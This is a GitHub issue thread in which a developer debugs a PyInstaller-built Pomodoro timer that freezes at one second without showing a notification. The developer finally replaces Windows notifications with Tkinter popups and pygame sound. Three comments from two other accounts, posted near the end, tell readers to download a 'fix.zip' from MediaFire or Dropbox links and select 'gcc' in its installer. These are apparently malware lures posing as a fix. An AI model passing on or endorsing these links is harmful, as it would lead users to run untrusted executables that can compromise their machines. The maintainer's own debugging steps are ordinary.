### ISSUE TITLE
Timer Stops at 1 Second and Does Not Transition When Running Executable; Notification Not Displayed

### ISSUE THREAD

**Issue by robertmorgan-se** [Morganiron/Pomodoro_Notifier#1]
## Description
When using the Pomodoro Timer executable created with PyInstaller, the timer stops at 1 second left and does not transition to the next phase (break or work). This issue does not occur when running the `pomodoro_timer.py` script directly from PyCharm.

## Behavior Details
- If no sound is selected: The timer reaches 1 second remaining and stops. No transition to the next interval occurs, and no notification is displayed.
- If a sound is selected: The sound plays when the timer reaches 1 second, but the timer still stops at 1 second. No notification is shown, and the timer does not move to the next interval.

## Steps to Reproduce
1. Clone the repository and set up a virtual environment.
2. Install dependencies using `pip install -r requirements.txt`.
3. Create the executable using PyInstaller:
    ```bash
    pyinstaller --onefile --windowed pomodoro_timer.py
    ```
4. Run the generated executable.
5. Start the Pomodoro Timer.
6. Observe the timer when it reaches 1 second left.

## Expected Behavior
- The timer should transition to the next interval (work to break or break to work) and continue running smoothly.
- A desktop notification should be displayed when the timer transitions.

## Actual Behavior
- The timer stops with 1 second left.
- The notification is not displayed.
- The application does not transition to the next interval.

## Environment
- **Issue Specific to**: Executable created using PyInstaller
- **Operating System**: Windows 11
- **Python Version**: 3.12.5
- **PyInstaller Version**: 6.10.0
- **Libraries**: `plyer` for notifications, `playsound` for sound playback

## Logs
- [Attach `pomodoro.log` if it exists, or describe any error messages seen in the console or log file]

## Additional Context
- Running the script directly in PyCharm works as expected, with notifications and interval transitions functioning correctly.
- The issue may involve how PyInstaller handles threading, notifications, or sound playback in the standalone executable.

**Comment by robertmorgan-se** [comment]
### Progress Update

**Steps Taken:**
- Added logging throughout the application to better understand where the issue might be occurring.
- Observed differences in behavior between running the script in PyCharm and running the executable created with PyInstaller.

**Findings:**
- In PyCharm, the sound plays, and the notification is displayed after the sound finishes.
- In the executable, the sound plays, but the timer does not transition to the next phase, and the notification does not appear.

**Next Steps:**
- Switched from `playsound` to `pygame` for non-blocking sound playback to see if this resolves the issue.
- Rebuilt the executable with `pygame` for testing.
- Will analyze new logs to see if the issue persists and whether the sound and notification behavior is now consistent.

**Goal:**
- Ensure that the timer transitions correctly after the sound plays and that notifications are displayed both in the script and the executable versions.

**Comment by robertmorgan-se** [comment]
### Progress Update

**Recent Observations:**
- The issue persists even after switching to `pygame` for non-blocking sound playback.
- The timer correctly stops, and the sound plays, but the notification doesn't always display, and the timer does not transition to the next phase (work or break) after the notification.

**What We Are Trying Now:**
- We've refactored the `notify()` method in `timer.py` to follow a strict sequence:
  1. Stop the current timer once it reaches 0 seconds.
  2. Play the sound if a sound file is selected.
  3. Send the notification after the sound finishes playing.
  4. Start the appropriate next timer (work or break) after the notification is sent.

**Goal:**
- Ensure that the timer transitions correctly after playing the sound and displaying the notification. This should allow the break timer to start automatically after the work timer ends and vice versa.

We will now test these changes to see if they resolve the issue.

**Comment by robertmorgan-se** [comment]
### Progress Update

**Recent Findings:**
- Running the executable as an Administrator did not resolve the issue; notifications still do not appear when the executable is running.
- All notification settings in Windows are enabled, but there is no specific entry for the executable. The only entry is for Python, and notifications for Python are enabled.
- Testing on another machine is not currently possible, and we have decided not to go through the digital signing process.
- The issue with notifications persists even though the logs show they are being sent.

**Decision:**
- To simplify the notification process and avoid issues with system notifications, we will remove the Windows notification functionality.
- Instead, the application will notify the user with sound playback (if a sound file is selected) and a popup window displaying the notification message. The user will need to dismiss this popup window manually.

**Next Steps:**
1. Refactor the code to remove reliance on Windows system notifications.
2. Implement a popup window to display notification messages to the user.
3. Ensure the sound plays and the popup window displays when the timer reaches 0.
4. Test the changes to confirm that notifications are displayed reliably in the new format.

We will proceed with these changes to ensure consistent notification behavior.

**Comment by robertmorgan-se** [comment]
### Update on Issue Labels

**Note**: The issue originally started as a bug related to notifications not appearing in the executable. Given that we are now shifting the notification method to a custom solution (using sound and popup windows), this issue has evolved to also include enhancement work. We have added the `enhancement` label to reflect this change.

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by robertmorgan-se** [comment]
### Final Update

**Changes Made:**
- Implemented custom popup notifications using Tkinter, replacing system notifications.
- Added sound playback functionality using `pygame` for alerts.
- Disabled all logging to improve application efficiency and prevent log file growth.

**Testing:**
- The application was thoroughly tested, and the new notification method (popup and sound) works correctly.
- Timer transitions smoothly between work and break modes after each notification.
- Logging has been successfully disabled, and no unnecessary logs are generated.

**Conclusion:**
- The issue has been fully resolved with the new notification approach and logging adjustments.
- The application now provides consistent and reliable notifications without relying on system notifications, and logging is disabled to optimize performance.

Closing the issue.
